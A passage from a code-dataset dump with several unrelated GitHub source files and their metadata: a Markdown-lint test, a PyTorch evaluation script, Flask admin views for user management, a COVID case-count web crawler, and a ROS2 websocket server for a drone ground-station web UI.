spaces\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n admonition_valid = True\n\n if line.startswith(self.admonition_prefixes):\n inside_admonition = True\n admonition_valid = False\n\n if line.startswith(self.codeblock_prefix):\n inside_codeblock = not inside_codeblock\n\n if line.strip() == \"\":\n inside_list = False\n\n # TODO rewrite it someday with regex\n if line.startswith(self.list_prefixes) and not inside_codeblock:\n self.assertTrue(\n len(line) >= 2,\n \"List entries must have content\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n if line[1] == \" \":\n self.assertTrue(\n last_line.strip() == \"\"\n or last_line.strip().startswith(self.list_prefixes)\n or last_line.strip().startswith(\"#\")\n or inside_list,\n \"Lists need to have an empty line before them\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n inside_list = True\n\n self.assertTrue(\n line[1] == \" \" or (line[0] == \"*\" and line.count(\"*\") % 2 == 0),\n \"List markers need to be separated by a space\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: '{line}'\",\n )\n\n last_line = line\n\n self.assertTrue(\n not inside_codeblock, f\"File: {file_path} ended without closing a codeblock\"\n )\n\n print(f\"✅Tested {len(paths)} paths\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "Gothic-Modding-Community/gmc", "sub_path": "tests/test_indentation.py", "file_name": "test_indentation.py", "file_ext": "py", "file_size_in_byte": 3544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.path_constants.DOCS_DIR", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "tests.path_constants.DOCS_DIR", "line_number": 28, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "mkdocs.utils.meta.utils.meta.get_data", "line_number": 33, "usage_type": "call"}, {"api_name": "mkdocs.utils.meta.utils", "line_number": 33, 
"usage_type": "attribute"}, {"api_name": "mkdocs.utils.meta", "line_number": 33, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 102, "usage_type": "call"}]}
+{"seq_id": "70200420650", "text": "import os\nimport torch\nimport logging\nimport pdb\n\nfrom torch import nn, optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom config.opts import Config\nfrom model.model import *\nfrom model.model_attn import *\nfrom utils.loader import *\nfrom utils.utils import *\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\ndef write_(labels):\n\twith open('data/test.txt', 'r') as f:\n\t\tlines = f.readlines()\n\twith open('data/test_.txt', 'a') as f:\n\t\tf.write('\\t'.join(['id', 'turn1', 'turn2', 'turn3', 'label'])+'\\n')\n\t\tfor i, line in enumerate(lines[1:]):\n\t\t\tline_new = line.strip() + '\\t' + labels[i] + '\\n'\n\t\t\tf.write(line_new)\n\t\n\ndef test_sep(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model'].to(device)\n\tlmap = kwargs['lmap']\n\tilmap = {v:k for k,v in lmap.items()}\n\n\t# pdb.set_trace()\n\teval_object = Eval(lmap)\n\ttest_data_loader = DataLoader(dataset=input_,\n\t\t\t\t\t\t\t\tbatch_size=32)\n\tresults = []\n\tfor i, batch in enumerate(tqdm(test_data_loader)):\n\t\tinput_feature = [batch['input'][i].to(device) for i in range(len(batch['input']))]\n\t\toutput = model(input_feature)\n\t\tprediction = output.contiguous()\n\t\tprediction = eval_object.decode(prediction)\n\t\tprediction = prediction.cpu().numpy().tolist()\n\t\tresults.extend([ilmap[prediction[i]] for i in range(len(prediction))])\n\twrite_(results)\n\ndef test(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model']\n\tlmap = kwargs['lmap']\n\teval_object = Eval(lmap)\n\tresults = []\n\tilmap = {v:k for k,v in lmap.items()}\n\tfor idx in trange(len(input_)):\n\n\t\tsequence = torch.from_numpy(input_[idx]['feature']).to(device)\n\t\ttext = input_[idx]['input']\n\t\t# sequence = sequence.permute(1, 0)\n\t\tsequence = torch.unsqueeze(sequence, 0)\n\t\toutput = model(sequence)\n\t\tprediction = output.contiguous()\n\t\t# pdb.set_trace()\n\t\tprediction = eval_object.decode(prediction)\n\n\t\tresults.append(ilmap[prediction.cpu().numpy()[0]])\n\twrite_(results)\n\ndef test_batch(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model'].to(device)\n\tlmap = kwargs['lamp']\n\tilmap = {v:k for k,v in lmap.items()}\n\t# pdb.set_trace()\n\teval_object = Eval(lmap)\n\ttest_data_loader = DataLoader(dataset=input_,\n\t\t\t\t\t\t\t\tbatch_size=32)\n\tresults = []\n\tfor iteration, batch in enumerate(tqdm(test_data_loader)):\n\t\tinput_feature = batch['feature'].to(device)\n\t\tpdb.set_trace()\n\t\toutput = model(input_feature)\n\t\tprediction = output.contiguous()\n\t\tprediction = eval_object.decode(prediction)\n\t\tresults.extend(ilmap[prediction.cpu().numpy()[0]])\n\twrite_(results)\n\ndef main(**kwargs):\n\topt = Config()\n\topt._parse(kwargs)\n\tpath = opt.path\n\tlmap = opt.lmap\n\tvector_size = '%dd'%opt.inp\n\tdatasets = {} \n\t# datasets['test'] = TweetData_V02(path,'test',lmap, vector_size=vector_size)\n\t\n\tnIn = opt.inp\n\tdatasets = TweetData_V02('data/test.txt', lmap, nIn)\n\tnHidden = opt.hidden\t\n\tnClasses = opt.out\n\tdepth = opt.depth\n\tfilters = opt.filters\n\tseqlen = 156\n\t# model = RCNN_Text(nIn, nHidden).to(device)\n\t# model = Turnip(nIn, nHidden, nClasses, depth).to(device)\n\t# model = RCNN(nIn, nHidden, nClasses, seqlen, filters).cuda()\n\tmodel = RNN_attn(nIn, nHidden, nClasses, depth).to(device)\n\tsave_dir = opt.save_dir\n\t# gmkdir(save_dir)\n\tsave_file = opt.save_file\n\tsavepath = save_dir + '/' + save_file\n\tcheckpoint = 
torch.load(savepath)\n\tmodel.load_state_dict(checkpoint['state_dict'])\n\ttest_sep(input=datasets,\n\t\tmodel=model,\n\t\tlmap=lmap)\n\nif __name__ == '__main__':\n\timport fire\n\tfire.Fire(main)\n", "repo_name": "Deepayan137/EmoContext", "sub_path": "evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 3435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.device", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "model.model", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 34, "usage_type": "call"}, {"api_name": "model.model", "line_number": 39, "usage_type": "call"}, {"api_name": "model.model", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 58, "usage_type": "call"}, {"api_name": "model.model", "line_number": 59, "usage_type": "call"}, {"api_name": "model.model", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 74, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 79, "usage_type": "call"}, {"api_name": "model.model", "line_number": 80, "usage_type": "call"}, {"api_name": "config.opts.Config", "line_number": 87, "usage_type": "call"}, {"api_name": "model.model", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "model.model.load_state_dict", "line_number": 111, "usage_type": "call"}, {"api_name": "model.model", "line_number": 111, "usage_type": "name"}, {"api_name": "model.model", "line_number": 113, "usage_type": "name"}, {"api_name": "fire.Fire", "line_number": 118, "usage_type": "call"}]}
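A note on the decoding pattern in the evaluate.py record above: predictions come back as integer class ids and are mapped to label strings through an inverted dict (ilmap). A standalone sketch of that step, using a hypothetical label map rather than the project's real one:

import torch

lmap = {"happy": 0, "sad": 1, "angry": 2, "others": 3}  # hypothetical label map
ilmap = {v: k for k, v in lmap.items()}                 # invert: id -> label

logits = torch.tensor([[0.1, 2.3, 0.4, 0.2],
                       [1.5, 0.2, 0.1, 0.3]])
pred_ids = torch.argmax(logits, dim=1).tolist()         # stand-in for Eval.decode
labels = [ilmap[i] for i in pred_ids]
print(labels)  # ['sad', 'happy']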
+{"seq_id": "12441493421", "text": "from flask.json import jsonify\nfrom app.auth.models import Role, User\nfrom prime_admin.forms import PartnerForm, SecretaryEditForm, SecretaryForm, StudentForm, TeacherForm, TrainingCenterEditForm, TrainingCenterForm\nfrom flask_login import login_required, current_user\nfrom app.admin.templating import admin_render_template, admin_table, admin_edit\nfrom prime_admin import bp_lms\nfrom prime_admin.models import Branch, Secretary\nfrom flask import redirect, url_for, request, current_app, flash\nfrom app import mongo\nfrom datetime import datetime\nfrom config import TIMEZONE\nfrom prime_admin.globals import SECRETARYREFERENCE\n\n\n\n@bp_lms.route('/secretaries')\n@login_required\ndef secretaries():\n return admin_render_template(\n Secretary,\n 'lms/secretaries.html',\n 'learning_management',\n title=\"Secretaries\"\n )\n \n # form = SecretaryForm()\n # _table_data = []\n # secretary_role = Role.objects(name=\"Secretary\").first()\n # _secretaries = User.objects(role=secretary_role)\n # for secretary in _secretaries:\n # _table_data.append((\n # secretary.id,\n # secretary.fname,\n # secretary.lname,\n # secretary.branch.name if secretary.branch is not None else '',\n # secretary.created_by,\n # secretary.created_at_local,\n # secretary.updated_by,\n # secretary.updated_at_local\n # ))\n\n # return admin_table(\n # Secretary,\n # fields=[],\n # form=form,\n # table_data=_table_data,\n # create_button=None,\n # create_url=None,\n # create_modal=False,\n # # create_url='lms.create_secretary',\n # edit_url='lms.edit_secretary',\n # view_modal_url='/learning-management/get-view-secretary-data'\n # )\n\n\n@bp_lms.route('/secretaries/dt', methods=['GET'])\ndef fetch_secretaries_dt():\n draw = request.args.get('draw')\n start, length = int(request.args.get('start')), int(request.args.get('length'))\n search_value = request.args.get(\"search[value]\")\n\n total_records: int\n filtered_records: int\n\n if search_value != '':\n query = list(mongo.db.auth_users.aggregate([\n {\"$match\": {'lname': {'$regex': search_value}, 'role': SECRETARYREFERENCE}},\n {\"$lookup\": {\n 'from': 'lms_branches',\n 'localField': 'branch',\n 'foreignField': '_id',\n 'as': 'branch'\n }\n }]))\n total_records = len(query)\n else:\n query = list(mongo.db.auth_users.aggregate([\n {\"$match\": {'role': SECRETARYREFERENCE}},\n {\"$lookup\": {\n 'from': 'lms_branches',\n 'localField': 'branch',\n 'foreignField': '_id',\n 'as': 'branch'\n }\n },\n {\"$skip\": start},\n {\"$limit\": length},\n ]))\n total_records = mongo.db.auth_users.find({'role': SECRETARYREFERENCE}).count()\n\n filtered_records = len(query)\n \n table_data = []\n \n for data in query:\n lname = data.get('lname', '')\n fname = data.get('fname', '')\n branch = data.get('branch', [{'name': ''}])[0]\n created_by = data.get('created_by', '')\n created_at = data.get('created_at', '')\n updated_by = data.get('updated_by', '')\n updated_at = data.get('updated_at', '')\n \n table_data.append([\n str(),\n lname,\n fname,\n branch['name'],\n created_by,\n created_at,\n updated_by,\n updated_at,\n ])\n\n response = {\n 'draw': draw,\n 'recordsTotal': filtered_records,\n 'recordsFiltered': total_records,\n 'data': table_data,\n }\n\n return jsonify(response)\n\n\n@bp_lms.route('/get-view-secretary-data', methods=['GET'])\n@login_required\ndef get_view_user_data():\n _column, _id = request.args.get('column'), request.args.get('id')\n\n _data = User.objects(id=_id).values_list(_column)\n\n response = 
jsonify(result=str(_data[0]),column=_column)\n\n if _column == \"branch\" and _data[0] is not None:\n response = jsonify(result=str(_data[0].id),column=_column)\n\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.status_code = 200\n return response\n\n\n@bp_lms.route('/secretaries/create',methods=['GET','POST'])\n@login_required\ndef create_secretary():\n form = SecretaryForm()\n\n if not form.validate_on_submit():\n for key, value in form.errors.items():\n flash(str(key) + str(value), 'error')\n return redirect(url_for('lms.secretaries'))\n\n try:\n secretary = User()\n\n secretary.fname = form.fname.data\n secretary.lname = form.lname.data\n secretary.branch = Branch.objects.get(id=form.branch.data)\n secretary.role = Role.objects(name=\"Secretary\").first()\n secretary.username = form.username.data\n secretary.email = form.email.data if form.email.data != '' else None\n secretary.set_password(\"password\")\n secretary.is_superuser = False\n\n secretary.created_by = \"{} {}\".format(current_user.fname,current_user.lname)\n\n secretary.save()\n\n flash('New Secretary Added Successfully!','success')\n\n except Exception as e:\n flash(str(e),'error')\n \n return redirect(url_for('lms.secretaries'))\n\n\n@bp_lms.route('/secretaries//edit', methods=['GET', 'POST'])\n@login_required\ndef edit_secretary(oid):\n secretary = User.objects.get_or_404(id=oid)\n form = SecretaryEditForm(obj=secretary)\n\n if request.method == \"GET\":\n\n return admin_edit(\n Secretary,\n form,\n 'lms.edit_secretary',\n oid,\n 'lms.secretaries',\n )\n \n if not form.validate_on_submit():\n for key, value in form.errors.items():\n flash(str(key) + str(value), 'error')\n return redirect(url_for('lms.secretaries'))\n \n try:\n secretary.fname = form.fname.data\n secretary.lname = form.lname.data\n secretary.branch = Branch.objects.get(id=form.branch.data)\n secretary.role = Role.objects(name=\"Secretary\").first()\n secretary.username = form.username.data\n secretary.email = form.email.data if form.email.data != '' else None\n secretary.set_updated_at()\n secretary.updated_by = \"{} {}\".format(current_user.fname,current_user.lname)\n \n secretary.save()\n flash('Secretary Updated Successfully!','success')\n\n except Exception as e:\n flash(str(e),'error')\n\n return redirect(url_for('lms.secretaries'))\n", "repo_name": "likes-team/prime-web-admin", "sub_path": "prime_admin/views/secretary.py", "file_name": "secretary.py", "file_ext": "py", "file_size_in_byte": 6702, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.admin.templating.admin_render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "prime_admin.models.Secretary", "line_number": 20, "usage_type": "argument"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 16, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 16, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": 
"flask.request.args.get", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.aggregate", "line_number": 66, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 66, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 66, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 67, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.aggregate", "line_number": 77, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 77, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 77, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 78, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.find", "line_number": 89, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 89, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.json.jsonify", "line_number": 122, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 56, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 128, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 128, "usage_type": "name"}, {"api_name": "app.auth.models.User.objects", "line_number": 130, "usage_type": "call"}, {"api_name": "app.auth.models.User", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.json.jsonify", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.json.jsonify", "line_number": 135, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 125, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 125, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 126, "usage_type": "name"}, {"api_name": "prime_admin.forms.SecretaryForm", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 150, "usage_type": "call"}, {"api_name": "app.auth.models.User", "line_number": 153, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects.get", "line_number": 157, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "prime_admin.models.Branch", "line_number": 157, "usage_type": "name"}, {"api_name": "app.auth.models.Role.objects", "line_number": 158, "usage_type": "call"}, {"api_name": "app.auth.models.Role", "line_number": 158, "usage_type": "name"}, {"api_name": "flask_login.current_user.fname", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 164, "usage_type": "name"}, {"api_name": "flask_login.current_user.lname", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.redirect", 
"line_number": 173, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 173, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 142, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 142, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 143, "usage_type": "name"}, {"api_name": "app.auth.models.User.objects.get_or_404", "line_number": 179, "usage_type": "call"}, {"api_name": "app.auth.models.User.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "app.auth.models.User", "line_number": 179, "usage_type": "name"}, {"api_name": "prime_admin.forms.SecretaryEditForm", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "app.admin.templating.admin_edit", "line_number": 184, "usage_type": "call"}, {"api_name": "prime_admin.models.Secretary", "line_number": 185, "usage_type": "argument"}, {"api_name": "flask.flash", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 195, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "prime_admin.models.Branch", "line_number": 200, "usage_type": "name"}, {"api_name": "app.auth.models.Role.objects", "line_number": 201, "usage_type": "call"}, {"api_name": "app.auth.models.Role", "line_number": 201, "usage_type": "name"}, {"api_name": "flask_login.current_user.fname", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 205, "usage_type": "name"}, {"api_name": "flask_login.current_user.lname", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 213, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 176, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 176, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 177, "usage_type": "name"}]}
+{"seq_id": "25955222173", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport datetime, requests, re, os\nfrom num2words import num2words\n\nnumber_dict = {}\nnumber_dict[\"kein\"] = 0\nnumber_dict[\"keine\"] = 0\nnumber_dict[\"keiner\"] = 0\nnumber_dict[\"eine\"] = 1\nnumber_dict[\"einer\"] = 1\n\nfor i in range(1, 501):\n number_dict[ num2words(i, lang='de') ] = i\n \ndef germanWordToInt(w): \n if re.match(\"^[0-9]{1,}$\", w) is not None:\n return int(w)\n else: \n for n in number_dict:\n if ( w.lower() == n ):\n return number_dict[n]\n return False\n \n \ndef getHBNSubPage(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n try:\n r = requests.get('https://www.landkreis-hildburghausen.de' + url.replace(\"&\", \"&\"), headers=headers, allow_redirects=True, timeout=5.0)\n return r.text\n except:\n return False\n \n\ndef getHBNNumbers(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n \n pattern_Subpage = re.compile(r\"([0-9]{1,2}\\.[0-9]{1,2}\\.[0-9]{4,4}) \\s*?\")\n pattern_date = re.compile(r\"([0-9]{1,})\\.([0-9]{1,}).([0-9]{2,4}),\\s?([0-9]{1,})[\\.:]([0-9]{1,})\") \n \n num_pattern_T = re.compile(r\"\\s([^\\s]*)\\s(?:positiv\\sgetestete\\sPersonen|Personen\\spositiv)\")\n num_pattern_R = re.compile(r\"([^\\.\\s]*)\\sPersonen[^\\.]*?(?:genesen|überstanden)\")\n num_pattern_D = re.compile(r\"\\s([^\\s]*)\\s(?:Todesfall|Todesfälle|Verstorbene|Tote)\")\n \n replace_array = [\"\", \"
\", \"\", \" \", \"\", \" \", \"\\n\", \"\\t\", \"\\r\" ]\n \n html_replace_dict = {\n \" \": \" \",\n \"ä\": \"ä\",\n \"ö\": \"ö\",\n \"ü\": \"ü\",\n \"Ä\": \"Ä\",\n \"Ö\": \"Ö\",\n \"Ü\": \"Ü\",\n \"ß\": \"ß\"\n }\n \n deceased_cnt = 0\n \n try:\n r = requests.get(url, headers=headers, allow_redirects=True, timeout=5.0)\n \n pmsub = pattern_Subpage.findall( r.text )\n pmsub.reverse() \n \n for pm in pmsub:\n pm_content = getHBNSubPage(pm[1])\n \n for entry in replace_array:\n pm_content = pm_content.replace(entry, \"\")\n \n for entry in html_replace_dict:\n pm_content = pm_content.replace(entry, html_replace_dict[entry])\n \n pd = pattern_date.findall( pm_content )\n \n if ( len(pd) < 1 ):\n continue\n \n timestamp = int(datetime.datetime(int(pd[0][2]), int(pd[0][1]), int(pd[0][0]), int(pd[0][3]) if int(pd[0][3]) < 24 else 23, int(pd[0][4]) ).strftime(\"%s\"))\n \n ps1 = num_pattern_T.findall( pm_content )\n if ( len(ps1) < 0 ):\n continue\n \n num_t = germanWordToInt(ps1[0])\n if num_t is False:\n continue\n \n ps2 = num_pattern_R.findall( pm_content )\n \n num_r = germanWordToInt(ps2[0]) if len(ps2) >= 1 else -1\n if num_r is False:\n num_r = -1\n \n ps3 = num_pattern_D.findall( pm_content )\n num_d = germanWordToInt(ps3[0]) if len(ps3) >= 1 else -1\n if num_d is False: \n num_d = -1\n \n if ( num_d == -1 ):\n num_d = deceased_cnt\n else:\n deceased_cnt = num_d\n \n num_h = -1\n num_s = -1\n \n return [timestamp, num_t, num_r, num_d, num_h, num_s]\n \n except:\n return False \n\n\nif __name__ == \"__main__\":\n \n DATAFILE = os.path.dirname(os.path.realpath(__file__)) + \"/../data/cases_hbn.csv\"\n URL = 'https://www.landkreis-hildburghausen.de/Aktuelles-Covid-19/Aktuelles-zu-Covid-19-im-Landkreis/Aktuelle-Meldungen-aus-dem-Landkreis'\n \n num_latest = getHBNNumbers(URL)\n \n if (num_latest != False) and (num_latest[1] > -1):\n # get old values\n with open(DATAFILE, 'r') as df:\n raw_data = df.read().splitlines()\n last_values = raw_data[-1].split(\",\")[1:6]\n \n # check for changes\n value_changed = False\n for i in enumerate(last_values):\n if ( int(i[1]) != num_latest[i[0]+1] ):\n if ( ( num_latest[i[0]+1] != -1 ) and ( i[0] != 2 ) ):\n value_changed = True\n \n # deceased number is not always included in new reports\n if value_changed:\n num_latest[3] = max(num_latest[3], int(last_values[2]))\n \n if value_changed:\n # write new csv data\n f = open(DATAFILE, 'a')\n f.write(\"%i,%i,%i,%i,%i,%i,%s\\n\" % (num_latest[0], num_latest[1], num_latest[2], num_latest[3], num_latest[4], num_latest[5], URL))\n f.close()\n", "repo_name": "micb25/corona-jena", "sub_path": "crawler/crawler_hbn.py", "file_name": "crawler_hbn.py", "file_ext": "py", "file_size_in_byte": 5061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "53", "api": [{"api_name": "num2words.num2words", "line_number": 15, "usage_type": "call"}, {"api_name": "re.match", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 40, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "call"}, 
{"api_name": "os.path.dirname", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "33881369147", "text": "\"\"\"GCS WebUI WebSockets server\n\nListens on several topics to serve WebSocket connections from our GCS WebUI, \nalso publishes to /pathy/dms, on request of the WebUI.\n\nSee /gcs/webui.html in the repo for the client-side part.\nNot to be confused with the Mavlink ground control software (QGroundControl/\nMission Planner).\n\"\"\"\n\nimport sys, base64, json\nfrom enum import Enum\nfrom typing import Any\n\nimport cv2\nimport numpy as np\n\nimport rclpy\nfrom rclpy.node import MsgType, Node\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import String, Empty\n\nimport asyncio\nimport websockets\n\n\ndef opencv_to_b64(img: np.dtype, img_type: str = \"png\") -> str:\n is_success, mask_buf = cv2.imencode(f\".{img_type}\", img)\n if not is_success:\n raise Exception(\"Could not encode image\")\n b64 = base64.b64encode(mask_buf.tobytes()).decode('utf-8')\n return b64\n\ndef b64_to_opencv(b64: str) -> np.dtype:\n img_bytes = base64.b64decode(b64)\n as_np = np.frombuffer(img_bytes, np.uint8)\n img = cv2.imdecode(as_np, cv2.IMREAD_ANYCOLOR)\n return img\n\nclass MessageType(Enum):\n RGB = \"RGB\"\n MASK = \"MASK\"\n PING = \"PING\" # https://stackoverflow.com/questions/10585355/sending-websocket-ping-pong-frame-from-browser\n PONG = \"PONG\"\n DMS = \"DMS\"\n STEER = \"STEER\"\n OFFLOADED_INFERENCE = \"OFFLOADED_INFERENCE\"\n\ndef create_websocket_msg(message_type: MessageType, data: Any):\n return json.dumps({\n \"type\": message_type.value,\n \"data\": data\n })\n\ndef parse_websocket_msg(msg: str):\n msg_obj = json.loads(msg)\n msg_type = MessageType[str(msg_obj[\"type\"])]\n msg_data = msg_obj[\"data\"]\n return msg_type, msg_data\n\ndef async_to_non_blocking(loop: asyncio.AbstractEventLoop, callback):\n def non_blocking_callback(**args): # TODO: args, kargs??\n loop.create_task(callback(**args))\n return non_blocking_callback\n\n\nclass GcsWebuiWsServer(Node):\n def __init__(self):\n super().__init__('gcs_webui_ws_server')\n loop = asyncio.get_event_loop()\n self.create_subscription(\n Image, '/pathy/rgb', async_to_non_blocking(loop, self._on_rgb), 10\n )\n # self.create_subscription(Image, '/pathy/mask', self._on_mask, 10)\n self.create_subscription(\n String, '/pathy/steering', \n async_to_non_blocking(loop, self._on_steering), 10\n )\n self._mask_pub = self.create_publisher(Image, '/pathy/mask', 10)\n self._dms_pub = self.create_publisher(Empty, '/pathy/dms', 10)\n self._bridge = CvBridge()\n self._clients = set()\n self._loop = asyncio.get_event_loop()\n\n async def init(self):\n await self._init_ws()\n self.get_logger().info('Init OK')\n \n async def serve_forever(self):\n self.get_logger().info('Running...')\n while not self.executor or self.executor.context.ok():\n rclpy.spin_once(self, timeout_sec=0)\n await asyncio.sleep(0) # yield\n\n async def _init_ws(self):\n await websockets.serve(self._on_new_client, \"0.0.0.0\", 5678)\n self.get_logger().info('Websocket init OK')\n\n async def _on_rgb(self, img_msg: Image):\n b64_img = opencv_to_b64(\n self._bridge.imgmsg_to_cv2(img_msg), img_type=\"jpg\")\n ws_msg = create_websocket_msg(MessageType.RGB, b64_img)\n await self._send_to_all(ws_msg)\n\n async def _on_mask(self, img_msg: Image):\n img = self._bridge.imgmsg_to_cv2(img_msg)\n await self._on_mask_async_parsed(img)\n\n async def _on_mask_async_parsed(self, img: np.dtype):\n return_msg_data = {\n \"type\": MessageType.MASK.value,\n \"data\": opencv_to_b64(img)\n }\n await 
